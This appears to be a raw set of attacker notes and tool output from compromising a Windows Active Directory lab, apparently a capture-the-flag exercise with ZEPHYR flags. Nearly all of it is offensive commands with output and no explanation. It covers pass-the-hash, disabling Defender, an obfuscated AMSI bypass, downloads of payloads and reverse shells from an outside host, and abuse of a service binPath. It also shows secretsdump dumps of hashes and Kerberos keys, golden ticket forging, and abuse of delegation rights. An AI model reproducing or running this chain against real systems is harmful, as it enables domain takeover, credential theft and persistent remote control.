internal.zsm.local\Steven:aes256-cts-hmac-sha1-96:9adcb602c37ce0ee4894d74a6575a6f70f7430e8e00446bc0850b787089c4cc4
internal.zsm.local\Steven:aes128-cts-hmac-sha1-96:e9731b435a8651cf11d52d71df936385
internal.zsm.local\Steven:des-cbc-md5:5dce8a52b389e5a2
internal.zsm.local\Malcolm:aes256-cts-hmac-sha1-96:f6e7d8a35afb386c1c271d6a53af85fcf8e306d36f281fdfc2c477c353f62c91
internal.zsm.local\Malcolm:aes128-cts-hmac-sha1-96:4bac2835d8be32ad5dd585ceb7450ef3
internal.zsm.local\Malcolm:des-cbc-md5:26b331256d2fbcd9
internal.zsm.local\Aron:aes256-cts-hmac-sha1-96:957fd600878eaad5dba70443e42d6a647b0b393211da3e62e55ef5bff965d9bb
internal.zsm.local\Aron:aes128-cts-hmac-sha1-96:26ef49f42cb51e023b50c84e360399eb
internal.zsm.local\Aron:des-cbc-md5:91cef44fc119f119
internal.zsm.local\Matt:aes256-cts-hmac-sha1-96:1877cc1d57a84d334b4a07a77c80086dfb76abe997f0339307efb32429b0deee
internal.zsm.local\Matt:aes128-cts-hmac-sha1-96:a4007666551eebd71856c6833faed374
internal.zsm.local\Matt:des-cbc-md5:2a4a5b467f9bb919
internal.zsm.local\Jamie:aes256-cts-hmac-sha1-96:899a0a57d770ad6510608350b67487beb5c50ac8f3455a1804ff4e8eb85da5e8
internal.zsm.local\Jamie:aes128-cts-hmac-sha1-96:abc87732e5844aafab3c8b355076a959
internal.zsm.local\Jamie:des-cbc-md5:5234a7253bd31f98
smith:aes256-cts-hmac-sha1-96:732bb6606076fbd27885722b4c57d7280e3a972642c34c16bce66814bf64a3b0
smith:aes128-cts-hmac-sha1-96:05b77f34a4406c4029b932e17d62c158
smith:des-cbc-md5:ec2c29e03837b685
ZPH-SVRCDC01$:aes256-cts-hmac-sha1-96:8a67907987149e76179c1717526a984b286656ce9c5afae114b11a0e1187d282
ZPH-SVRCDC01$:aes128-cts-hmac-sha1-96:68e66ddb5aaf1e796af831a3a0527699
ZPH-SVRCDC01$:des-cbc-md5:298c2fb6f823790d
ZPH-SVRCHR$:aes256-cts-hmac-sha1-96:9b37dffd2f9e191262978b8a9cc9b41f782165e4f4709973c9e1e5ada5f80e35
ZPH-SVRCHR$:aes128-cts-hmac-sha1-96:cf8f357935397b6fcf7058e751ffd9e6
ZPH-SVRCHR$:des-cbc-md5:4698c19bbaf8b667
ZPH-SVRCSUP$:aes256-cts-hmac-sha1-96:980035e13beb4c1b68e5071f0b919bf1a11b37cf3573e0a88f0305614fb361d3
ZPH-SVRCSUP$:aes128-cts-hmac-sha1-96:a98bbab60af92f6b8ce9d1f93e9a230c
ZPH-SVRCSUP$:des-cbc-md5:ec7acd5d73fb371f
ZSM-SVRCSQL02$:aes256-cts-hmac-sha1-96:1270026132348b974c1a948cd7b202ae9678b5b3b03cdbdb4be825c1c11f4d71
ZSM-SVRCSQL02$:aes128-cts-hmac-sha1-96:5d3e1581bca6b36aac111bb16bc8e2e1
ZSM-SVRCSQL02$:des-cbc-md5:bf8faba8893475a7
INT-MAINT$:aes256-cts-hmac-sha1-96:7c6282803848f411d9f819642f917bd14a023f3fb66d803868e04faa00c1c859
INT-MAINT$:aes128-cts-hmac-sha1-96:34cc456699aa20c6a3d00433fa959455
INT-MAINT$:des-cbc-md5:aebc7f4368a29885
ZSM$:aes256-cts-hmac-sha1-96:6f9dd2e95b0d477790cf26718e75f022c5743b2aeb2b7b413dcf186eb6c4b290
ZSM$:aes128-cts-hmac-sha1-96:cdf76265a702f0db58aa1081ceadefce
ZSM$:des-cbc-md5:025b3d794357349e
[*] Cleaning up... 
 
psexec.py Administrator@192.168.210.16 -hashes aad3b435b51404eeaad3b435b51404ee:c5940ff73882a95b73bdebe63210911f
 
psexec.py Administrator@192.168.210.16 -hashes aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e
 
wmiexec.py Administrator@192.168.210.16 -hashes aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e
 
powershell -Command "& {Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus}"
\\10.10.14.4\share\SHALLOW_SPADE.exe
 
certutil -urlcache -split -f http://10.10.14.4:445/SHALLOW_SPADE.exe
 
SINGLE_SHARK.exe
 
sliver (SINGLE_SHARK) > cat flag.txt
 
ZEPHYR{In73rn4l_D0m41n_D0m1n473d} :The Fall
 

.17

crackmapexec winrm 192.168.210.17 -u 'aron' -p 'ToughPasswordToCrack123!' -d internal.zsm.local
 
evil-winrm -i 192.168.210.17 -u aron -p 'ToughPasswordToCrack123!'
upload nc64.exe
upload RunasCs.exe
nc -lvvp 53
./RunasCs.exe -l 3 aron ToughPasswordToCrack123! -d internal.zsm.local --remote-impersonation 'c:\users\aron\documents\nc64.exe 10.10.14.4 5985 -e powershell.exe'
$test = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') $test212 = $test.GetField('amsiInitFailed', 'NonPublic,Static') $test212.SetValue($null, $true)
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
$psh = [PowerShell]::Create().AddCommand("powershell").AddParameter("ExecutionPolicy","Bypass").Invoke()
 
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
 
iex(iwr http://10.10.14.4:53/PowerUp.ps1 -UseBasicParsing)
 
iex(iwr http://10.10.14.4:53/Bypass-UAC.ps1 -UseBasicParsing)
 
 
 
 
$psh = [PowerShell]::Create().AddCommand("powershell").AddParameter("ExecutionPolicy","Bypass").Invoke()

[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)


iex(iwr http://10.10.14.4:53/Invoke-ReflectivePEInjection.ps1 -UseBasicParsing)


`$url = "http://10.10.14.4:53/SINGLE_SHARK.exe" 
$binary = (New-Object Net.WebClient).DownloadData($url)
Invoke-ReflectivePEInjection -PEBytes $binary`

iex(iwr http://10.10.14.4:53/large1.ps1 -UseBasicParsing)


powershell -ep bypass [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true);Import-Module ./PowerUp.ps1;Invoke-Allchecks

secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:06e402102d72956c62a63794a999935e internal.zsm.local/ZPH-SVRCHR\$@192.168.210.17
sc.exe qc wuauserv
sc.exe query wuauserv

sc.exe config wuauserv binPath="net localgroup Administrators aron /add"

sc.exe stop wuauserv
sc.exe start wuauserv

exit winrm and relogin


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat flag.txt
ZEPHYR{S3rv1c3_M4n4g3m3nt_f41L5} :tweaked

PS C:\Users\Administrator> cd ..
PS C:\Users> Import-Module ActiveDirectory
PS C:\Users> $domain = Get-ADDomain
PS C:\Users> $domain.DomainSID

BinaryLength AccountDomainSid                         Value
------------ ----------------                         -----
          24 S-1-5-21-3056178012-3972705859-491075245 S-1-5-21-3056178012-3972705859-491075245

.12

crackmapexec winrm 192.168.210.12 -u 'jamie' -p 'Password123!'
 
 
evil-winrm -i 192.168.210.12 -u jamie -p 'Password123!'
 
 
 
upload nc64.exe
upload RunasCs.exe
nc -lvvp 53
./RunasCs.exe -l 3 jamie Password123! -d zsm.local --remote-impersonation 'c:\users\jamie\documents\nc64.exe 10.10.14.4 53 -e cmd.exe'
 
powershell
 
$psh = [PowerShell]::Create().AddCommand("powershell").AddParameter("ExecutionPolicy","Bypass").Invoke()
 
[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
 
iex(iwr http://10.10.14.4:445/PowerUp.ps1 -UseBasicParsing)

.10

└─$ lookupsid.py internal.zsm.local/Administrator@192.168.210.16 -hashes 543beb20a2a579c7714ced68a1760d5e:543beb20a2a579c7714ced68a1760d5e 
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra

[*] Brute forcing SIDs at 192.168.210.16
[*] StringBinding ncacn_np:192.168.210.16[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3056178012-3972705859-491075245
500: internal\Administrator (SidTypeUser)
501: internal\Guest (SidTypeUser)
502: internal\krbtgt (SidTypeUser)
512: internal\Domain Admins (SidTypeGroup)
513: internal\Domain Users (SidTypeGroup)
514: internal\Domain Guests (SidTypeGroup)
515: internal\Domain Computers (SidTypeGroup)
516: internal\Domain Controllers (SidTypeGroup)
517: internal\Cert Publishers (SidTypeAlias)
520: internal\Group Policy Creator Owners (SidTypeGroup)
521: internal\Read-only Domain Controllers (SidTypeGroup)
522: internal\Cloneable Domain Controllers (SidTypeGroup)
525: internal\Protected Users (SidTypeGroup)
526: internal\Key Admins (SidTypeGroup)
553: internal\RAS and IAS Servers (SidTypeAlias)
571: internal\Allowed RODC Password Replication Group (SidTypeAlias)
572: internal\Denied RODC Password Replication Group (SidTypeAlias)
1000: internal\ZPH-SVRCDC01$ (SidTypeUser)
1101: internal\DnsAdmins (SidTypeAlias)
1102: internal\DnsUpdateProxy (SidTypeGroup)
1103: internal\ZSM$ (SidTypeUser)
1601: internal\ZPH-SVRCHR$ (SidTypeUser)
1602: internal\ZPH-SVRCSUP$ (SidTypeUser)
                                                  
└─$ lookupsid.py internal.zsm.local/Administrator@192.168.210.10 -hashes 543beb20a2a579c7714ced68a1760d5e:543beb20a2a579c7714ced68a1760d5e
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra

[*] Brute forcing SIDs at 192.168.210.10
[*] StringBinding ncacn_np:192.168.210.10[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2734290894-461713716-141835440
498: ZSM\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: ZSM\Administrator (SidTypeUser)
501: ZSM\Guest (SidTypeUser)
502: ZSM\krbtgt (SidTypeUser)
512: ZSM\Domain Admins (SidTypeGroup)
513: ZSM\Domain Users (SidTypeGroup)
514: ZSM\Domain Guests (SidTypeGroup)
515: ZSM\Domain Computers (SidTypeGroup)
516: ZSM\Domain Controllers (SidTypeGroup)
517: ZSM\Cert Publishers (SidTypeAlias)
518: ZSM\Schema Admins (SidTypeGroup)
519: ZSM\Enterprise Admins (SidTypeGroup)
520: ZSM\Group Policy Creator Owners (SidTypeGroup)
521: ZSM\Read-only Domain Controllers (SidTypeGroup)
522: ZSM\Cloneable Domain Controllers (SidTypeGroup)
525: ZSM\Protected Users (SidTypeGroup)
526: ZSM\Key Admins (SidTypeGroup)
527: ZSM\Enterprise Key Admins (SidTypeGroup)
553: ZSM\RAS and IAS Servers (SidTypeAlias)
571: ZSM\Allowed RODC Password Replication Group (SidTypeAlias)
572: ZSM\Denied RODC Password Replication Group (SidTypeAlias)
1000: ZSM\ZPH-SVRDC01$ (SidTypeUser)
1101: ZSM\DnsAdmins (SidTypeAlias)
1102: ZSM\DnsUpdateProxy (SidTypeGroup)
1104: ZSM\MAINTENANCE$ (SidTypeUser)
1105: ZSM\ZPH-GMSA-ADFS$ (SidTypeUser)
1106: ZSM\ZPH-SVRCA01$ (SidTypeUser)
1107: ZSM\daniel.morris (SidTypeUser)
1108: ZSM\ZPH-SVRADFS1$ (SidTypeUser)
1109: ZSM\PAINTERS$ (SidTypeUser)
1110: ZSM\paul.williams (SidTypeUser)
1601: ZSM\ZPH-SVRSQL01$ (SidTypeUser)
1602: ZSM\internal$ (SidTypeUser)

secretsdump.py internal.zsm.local/Administrator@192.168.210.16 -hashes 543beb20a2a579c7714ced68a1760d5e:543beb20a2a579c7714ced68a1760d5e
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xb1223a009047a376c120c3630a0f0e48
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5bdd6a33efe43f0dc7e3b2435579aa53:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
internal\ZPH-SVRCDC01$:aes256-cts-hmac-sha1-96:8a67907987149e76179c1717526a984b286656ce9c5afae114b11a0e1187d282
internal\ZPH-SVRCDC01$:aes128-cts-hmac-sha1-96:68e66ddb5aaf1e796af831a3a0527699
internal\ZPH-SVRCDC01$:des-cbc-md5:dc8c893b57c4e0ab
internal\ZPH-SVRCDC01$:plain_password_hex:dc66f30d3e8bd48b4bfb9c3f53eb66ebda1edbb7af476a9f7650476edce03326b61fabe212dfd9e6c2e06eaaffcab3c78cfd4f47cd564ef53e8eb5d855f9e998c34c5fabc5e713559e090d6e5dc149a97ed653608d5cd07864d7774f2d766512849d4fafff4030324173ccd8cb8c6a1513a348a337c6d46778e4e37bc2e2c2e369626f1f153bdf391f8c175fdae042537016a2198b8c120c738854c907a1ddddcb88aaa517af97bcee783d1d9a36ddc179f2bb5cc8a336a00863183c96384434bb9a8eee781822f51d2727cd14e3fd0841edfa7004eefa2a8e3327b457f34587642e1e91e79a24590d97b8ad6cb14ee7
internal\ZPH-SVRCDC01$:aad3b435b51404eeaad3b435b51404ee:d47a6d90e1c5adf4200227514e393948:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xf108ba9fcd3554a2abb82ff4a8d29f0679aeaae6
dpapi_userkey:0xe57f2322d588ce987f04d6a3b1bf31cfa35d050a
[*] NL$KM 
 0000   07 E9 F2 3F 08 49 46 07  02 CE 30 4B 65 D3 86 32   ...?.IF...0Ke..2
 0010   6F 02 5D 36 7D E8 30 33  F4 71 94 44 98 37 CB 1A   o.]6}.03.q.D.7..
 0020   05 CC 76 F1 26 E2 94 E7  D3 54 78 1F EF BE E9 13   ..v.&....Tx.....
 0030   30 3B 62 CB A5 57 75 E6  78 F3 D4 55 5C 68 20 15   0;b..Wu.x..U\h .
NL$KM:07e9f23f0849460702ce304b65d386326f025d367de83033f47194449837cb1a05cc76f126e294e7d354781fefbee913303b62cba55775e678f3d4555c682015
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::



krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0540fe51ddd618f42a66ef059ac36441:::




internal.zsm.local\mssql_svc:6101:aad3b435b51404eeaad3b435b51404ee:8cb21ab7f3ee6d782c724216bd88d1d1:::
internal.zsm.local\Emily:6601:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Laura:6602:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Melissa:6603:aad3b435b51404eeaad3b435b51404ee:184260f5bf16a77d67a9d540fda79495:::
internal.zsm.local\Sarah:6604:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Amy:6605:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Steven:6606:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Malcolm:6607:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Aron:6608:aad3b435b51404eeaad3b435b51404ee:8cb21ab7f3ee6d782c724216bd88d1d1:::
internal.zsm.local\Matt:6609:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
internal.zsm.local\Jamie:6610:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
ZPH-SVRCDC01$:1000:aad3b435b51404eeaad3b435b51404ee:d47a6d90e1c5adf4200227514e393948:::
ZPH-SVRCHR$:1601:aad3b435b51404eeaad3b435b51404ee:06e402102d72956c62a63794a999935e:::
ZPH-SVRCSUP$:1602:aad3b435b51404eeaad3b435b51404ee:36e7d551e7cb15ca7dad3fd851fc707f:::
ZSM-SVRCSQL02$:5601:aad3b435b51404eeaad3b435b51404ee:ad854719bbb6fc1664316a14cc6eb88d:::
INT-MAINT$:6102:aad3b435b51404eeaad3b435b51404ee:8c0aff2e562402c147dc9650b1eb86cb:::
ZSM$:1103:aad3b435b51404eeaad3b435b51404ee:caa09fc109945e3a5f5237e4a94c2242:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:fbbb5e79da10a8b4609429942c12329391e4af7213e69560893b81c421375f0b
Administrator:aes128-cts-hmac-sha1-96:1f50b00b725eb4ed09a3def4e75ec9f0
Administrator:des-cbc-md5:439ed652fe5b38ae
krbtgt:aes256-cts-hmac-sha1-96:3bdcbeb0910e5887e6d6c7fbec6c3f29e1e099322ac91cc386ca296a5c5497b0
krbtgt:aes128-cts-hmac-sha1-96:b6252a6e5ec060751a03c1a73ef2af4e
krbtgt:des-cbc-md5:92755ef7ce8a6e16
internal.zsm.local\mssql_svc:aes256-cts-hmac-sha1-96:bea9de16d6775f6ed646cf8e002b2e6845e219f080a709410cb600f909d105ff
internal.zsm.local\mssql_svc:aes128-cts-hmac-sha1-96:4df91cf757b8cb7c5f6e544236293c8d
internal.zsm.local\mssql_svc:des-cbc-md5:5bdf199ee546e6f8
internal.zsm.local\Emily:aes256-cts-hmac-sha1-96:6fac0f47c747960e583ab9cb6d93c31a9425f9a921d246766c2d1a798e10fb56
internal.zsm.local\Emily:aes128-cts-hmac-sha1-96:fbba2f446451e35dd9cbf1d376580e1f
internal.zsm.local\Emily:des-cbc-md5:fd374cc262ec9201
internal.zsm.local\Laura:aes256-cts-hmac-sha1-96:bf6a8feea25df8f1640143c2dc26bc76128748962aef3d5e1c315b8bc7acc8c0
internal.zsm.local\Laura:aes128-cts-hmac-sha1-96:b994efccf32f7827c5ec3a43126a1118
internal.zsm.local\Laura:des-cbc-md5:add68cc23470b0f8
internal.zsm.local\Melissa:aes256-cts-hmac-sha1-96:b09d86e2e6480c2122ee1383f24e592a9642e16470a82bdeb9fff6875d41a922
internal.zsm.local\Melissa:aes128-cts-hmac-sha1-96:289e6d2c65f84c94f185e9755708cf3b
internal.zsm.local\Melissa:des-cbc-md5:982a25f7dc4cb3e9
internal.zsm.local\Sarah:aes256-cts-hmac-sha1-96:81028d54164a46107a6f6b9b0ac9a9216aee0e8d4bce82a3c668d5e1f16774c5
internal.zsm.local\Sarah:aes128-cts-hmac-sha1-96:d130b796b81c66348bc67a95029a19c7
internal.zsm.local\Sarah:des-cbc-md5:29ceaeb664bc2f9e
internal.zsm.local\Amy:aes256-cts-hmac-sha1-96:940adf4174eaaa50218561b87644cdf0210cdecb40ee5b6672312ef39e7f4390
internal.zsm.local\Amy:aes128-cts-hmac-sha1-96:655645f7b62f9d073a00ef7142c8da33
internal.zsm.local\Amy:des-cbc-md5:49e0d6bfd69868b6
internal.zsm.local\Steven:aes256-cts-hmac-sha1-96:9adcb602c37ce0ee4894d74a6575a6f70f7430e8e00446bc0850b787089c4cc4
internal.zsm.local\Steven:aes128-cts-hmac-sha1-96:e9731b435a8651cf11d52d71df936385
internal.zsm.local\Steven:des-cbc-md5:5dce8a52b389e5a2
internal.zsm.local\Malcolm:aes256-cts-hmac-sha1-96:f6e7d8a35afb386c1c271d6a53af85fcf8e306d36f281fdfc2c477c353f62c91
internal.zsm.local\Malcolm:aes128-cts-hmac-sha1-96:4bac2835d8be32ad5dd585ceb7450ef3
internal.zsm.local\Malcolm:des-cbc-md5:26b331256d2fbcd9
internal.zsm.local\Aron:aes256-cts-hmac-sha1-96:957fd600878eaad5dba70443e42d6a647b0b393211da3e62e55ef5bff965d9bb
internal.zsm.local\Aron:aes128-cts-hmac-sha1-96:26ef49f42cb51e023b50c84e360399eb
internal.zsm.local\Aron:des-cbc-md5:91cef44fc119f119
internal.zsm.local\Matt:aes256-cts-hmac-sha1-96:1877cc1d57a84d334b4a07a77c80086dfb76abe997f0339307efb32429b0deee
internal.zsm.local\Matt:aes128-cts-hmac-sha1-96:a4007666551eebd71856c6833faed374
internal.zsm.local\Matt:des-cbc-md5:2a4a5b467f9bb919
internal.zsm.local\Jamie:aes256-cts-hmac-sha1-96:899a0a57d770ad6510608350b67487beb5c50ac8f3455a1804ff4e8eb85da5e8
internal.zsm.local\Jamie:aes128-cts-hmac-sha1-96:abc87732e5844aafab3c8b355076a959
internal.zsm.local\Jamie:des-cbc-md5:5234a7253bd31f98
ZPH-SVRCDC01$:aes256-cts-hmac-sha1-96:8a67907987149e76179c1717526a984b286656ce9c5afae114b11a0e1187d282
ZPH-SVRCDC01$:aes128-cts-hmac-sha1-96:68e66ddb5aaf1e796af831a3a0527699
ZPH-SVRCDC01$:des-cbc-md5:298c2fb6f823790d
ZPH-SVRCHR$:aes256-cts-hmac-sha1-96:9b37dffd2f9e191262978b8a9cc9b41f782165e4f4709973c9e1e5ada5f80e35
ZPH-SVRCHR$:aes128-cts-hmac-sha1-96:cf8f357935397b6fcf7058e751ffd9e6
ZPH-SVRCHR$:des-cbc-md5:4698c19bbaf8b667
ZPH-SVRCSUP$:aes256-cts-hmac-sha1-96:980035e13beb4c1b68e5071f0b919bf1a11b37cf3573e0a88f0305614fb361d3
ZPH-SVRCSUP$:aes128-cts-hmac-sha1-96:a98bbab60af92f6b8ce9d1f93e9a230c
ZPH-SVRCSUP$:des-cbc-md5:ec7acd5d73fb371f
ZSM-SVRCSQL02$:aes256-cts-hmac-sha1-96:1270026132348b974c1a948cd7b202ae9678b5b3b03cdbdb4be825c1c11f4d71
ZSM-SVRCSQL02$:aes128-cts-hmac-sha1-96:5d3e1581bca6b36aac111bb16bc8e2e1
ZSM-SVRCSQL02$:des-cbc-md5:bf8faba8893475a7
INT-MAINT$:aes256-cts-hmac-sha1-96:7c6282803848f411d9f819642f917bd14a023f3fb66d803868e04faa00c1c859
INT-MAINT$:aes128-cts-hmac-sha1-96:34cc456699aa20c6a3d00433fa959455
INT-MAINT$:des-cbc-md5:aebc7f4368a29885
ZSM$:aes256-cts-hmac-sha1-96:d14c3a49f01db9d821a6df62b06dbd209fb39d7164ccf6b994a8fa2473e21e7f
ZSM$:aes128-cts-hmac-sha1-96:0b7cee6e01fd63e61057fac9e26ff52e
ZSM$:des-cbc-md5:7508dc292cbf16b5
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

 S-1-5-21-3056178012-3972705859-491075245
S-1-5-21-2734290894-461713716-141835440
0540fe51ddd618f42a66ef059ac36441
ticketer.py -nthash 0540fe51ddd618f42a66ef059ac36441 -domain internal.zsm.local -domain-sid  S-1-5-21-3056178012-3972705859-491075245 -extra-sid S-1-5-21-2734290894-461713716-141835440-519 Administrator



Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for internal.zsm.local/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncAsRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncASRepPart
[*] Saving ticket in Administrator.ccache
                                      
export KRB5CCNAME=Administrator.ccache

secretsdump.py internal.zsm.local/Administrator@ZPH-SVRDC01.zsm.local -k -no-pass -target-ip 192.168.210.10




Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::



ZSM\ZPH-SVRDC01$:aad3b435b51404eeaad3b435b51404ee:b02f38febbe88d3297f779bf41157502:::


[*] Using the DRSUAPI method to get NTDS.DIT secrets

Administrator:500:aad3b435b51404eeaad3b435b51404ee:84210eddc5724a7801fe78289ee94d44:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8a72936717997f33694d17bd2ce909fe:::
zsm.local\daniel.morris:1107:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
zsm.local\paul.williams:1110:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
zsm.local\marcus:4102:aad3b435b51404eeaad3b435b51404ee:3b24c391862f4a8531a245a0217708c4:::
zsm.local\ca_svc:4104:aad3b435b51404eeaad3b435b51404ee:7f3e79164258b9aeb22e6aff46a5ee69:::
zsm.local\jamie:4602:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
ZPH-SVRDC01$:1000:aad3b435b51404eeaad3b435b51404ee:b02f38febbe88d3297f779bf41157502:::
MAINTENANCE$:1104:aad3b435b51404eeaad3b435b51404ee:fe00c35591cfa216447f51e436a185d6:::
ZPH-GMSA-ADFS$:1105:aad3b435b51404eeaad3b435b51404ee:4b896425f96da66ebdf84262a2d0296f:::
ZPH-SVRCA01$:1106:aad3b435b51404eeaad3b435b51404ee:251e366fdd64eff18be0824ec7c6833c:::
ZPH-SVRADFS1$:1108:aad3b435b51404eeaad3b435b51404ee:24039a7fd44d8decd80b0897e333ec06:::
ZPH-SVRSQL01$:1601:aad3b435b51404eeaad3b435b51404ee:ecf68b5e132ca80e6864215d5fcbba03:::
ZPH-SVRMGMT1$:4101:aad3b435b51404eeaad3b435b51404ee:89d0b56874f61ad38bad336a77b8ef2f:::
PAINTERS$:1109:aad3b435b51404eeaad3b435b51404ee:9d9c6188ac651f4e58d7a73a929b6644:::
internal$:1602:aad3b435b51404eeaad3b435b51404ee:e0a8f7125ae32c3775ed9ecbb51c8680:::




wmiexec.py zsm.local/Administrator@192.168.210.10 -hashes aad3b435b51404eeaad3b435b51404ee:84210eddc5724a7801fe78289ee94d44


powershell -Command "& {Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus}"


certutil -urlcache -split -f http://10.10.17.0:53/SUBSTANTIAL_CAMPAIGN.exe

SUBSTANTIAL_CAMPAIGN.exe


sliver (SHALLOW_SPADE) > cat flag.txt

ZEPHYR{34t1ng_7h3_B0n3s_0f_N3tw0rks} :Compromised

.14

 
net group "Enterprise Admins" marcus /add /domain
 
Add-DomainObjectAcl -TargetIdentity ZPH-SVRADFS1 -PrincipalIdentity marcus -Rights All
 
addcomputer.py -method LDAPS -computer-name attackersystem -computer-pass 'Summer2018!' -dc-host 192.168.210.10 'zsm.local/marcus:!QAZ2wsx'
 
└─$ rbcd.py -delegate-from attackersystem$ -delegate-to ZPH-SVRADFS1$ -action 'write' 'zsm.local/marcus:!QAZ2wsx'
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
 
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] attackersystem$ can now impersonate users on ZPH-SVRADFS1$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     attackersystem$   (S-1-5-21-2734290894-461713716-141835440-19101)
 
└─$ getST.py -spn 'cifs/ZPH-SVRADFS1.zsm.local' -impersonate 'Administrator' 'zsm.local/attackersystem$:Summer2018!'
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
 
[*] Getting TGT for user
[*] Impersonating Administrator
[*] 	Requesting S4U2self
[*] 	Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
                                          
 
secretsdump.py ZPH-SVRADFS1.zsm.local -k         
Impacket v0.12.0.dev1+20230921.20754.9c8f344b - Copyright 2023 Fortra
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x90c9f7848607977407f9afabdb3cfcc0
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
